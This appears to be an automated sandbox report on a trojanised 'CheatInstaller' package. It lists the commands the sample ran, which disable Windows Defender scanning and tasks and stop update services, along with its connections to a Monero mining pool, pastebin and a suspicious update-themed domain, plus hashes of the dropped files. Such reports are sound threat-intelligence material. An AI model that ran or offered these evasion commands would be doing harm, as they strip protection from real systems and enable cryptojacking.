powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b8b216e-be33-47f5-90c9-2ab93a85e4c3.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d2090d71-974d-49fa-8cd0-1f8c91a75e56.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 systemupdate.cfd udp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 138.248.137.23.in-addr.arpa udp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
US 8.8.8.8:53 systemupdate.cfd udp
NL 23.137.248.138:443 systemupdate.cfd tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe

MD5 e63a8f56acfabd4d75da44d3bda51884
SHA1 7d7ec25c29c5d562f8f0c2fb8d574680ce6836f7
SHA256 3cfba77df07101d2a7ef245e7c117716a67f67a2f2ec060f9c534dd0d8cc1db9
SHA512 e3af8ce282993fc89489d853cee0e447e8a7dfad749348c927d2a6b18f22da09bb4ed593d8891f3fc95fbfb2a090e2ab3121ec4a7659bc7c7b6d36756e164d02

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe

MD5 98646960d36b268658a83e8a61b021a3
SHA1 9888a52fb997168a6e32bab22a39ffcb55f4a2cb
SHA256 88d877705743ea6d2e267a9be26fec96a7f3b0c8bdfa587c955e716752b9179d
SHA512 be893a672f6a7e7f649ae7886c60702e5465d0088a83dcde2d9879e1a962352d2633476e97a8a4e94d8c9715cdf8a3c5c8199e4bc36dbdb9663e1eb22a532ebf

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 76eedaf767f7ed00bc8026754e4ab8a4
SHA1 f2e5d97586a43b899a5213f83d4b84d8413e541c
SHA256 64392c91f00f40ea4251fece7d65b5364a33d1ac0da44d8d5ebe771f60f691a4
SHA512 417f95aad5d392a8df930261d19c1166ad8c1ad7787b95f5597c1fd6754927f3019b4c2a3c2c00a99bc794dd095e62767eab1e776a2f54562efe10a72323d7e9

C:\Users\Admin\AppData\Local\Temp\MSI4022.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI4256.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Windows\Installer\MSI4D84.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

memory/1288-3595-0x0000018BF1AE0000-0x0000018BF1B02000-memory.dmp

memory/1288-3596-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

memory/1288-3599-0x0000018BF1B10000-0x0000018BF1B20000-memory.dmp

memory/1288-3598-0x0000018BF1B10000-0x0000018BF1B20000-memory.dmp

memory/1288-3601-0x0000018BF1DF0000-0x0000018BF1E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktp10pyz.2dv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\pss532F.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scr52FF.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr502F.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

memory/1288-3701-0x0000018BF1B10000-0x0000018BF1B20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/1288-3728-0x0000018BF1B10000-0x0000018BF1B20000-memory.dmp

memory/1288-3741-0x00007FFD39B80000-0x00007FFD3A56C000-memory.dmp

\Windows\Installer\MSI64C8.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 5392a5fb1c3d0ce48ee2f6db8c8c157c
SHA1 694ad4d5939fa7d468399150a026a3efce6773bf
SHA256 1033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901
SHA512 1a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 1f17c039e805f0366322565c65c44a96
SHA1 58f9a9787e412e22bdfdf80ee989cd0ca76b7ec6
SHA256 618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666
SHA512 2980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 fdc8f9825bac64dbdceff1b1ecfbcf53
SHA1 d831b8fc76023af06b13a05811c18611b7c394f3
SHA256 9d0e13ff2e27a1e3dd01847e67cf787050764c8b1369d90a60a3a03aa498d00a
SHA512 e2216ab419edb6378ca85f1593330a2d68aa6867e4145a93a6a9c4fc0fc80a11f89f6f270ae95549982f0f5f4142512c6b3db7f6fd626971fa26295bccc88b46

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 f759d9f3f35dda05908011fcaed1d018
SHA1 0a7852907851700f7424094b7658d78743559dae
SHA256 1780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919
SHA512 6cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 84cb9d76404e7060326ed19dc51a9a1f
SHA1 5945326bbc8b4e48afbea13f8c2cf564ffbafbee
SHA256 c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b
SHA512 95f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28

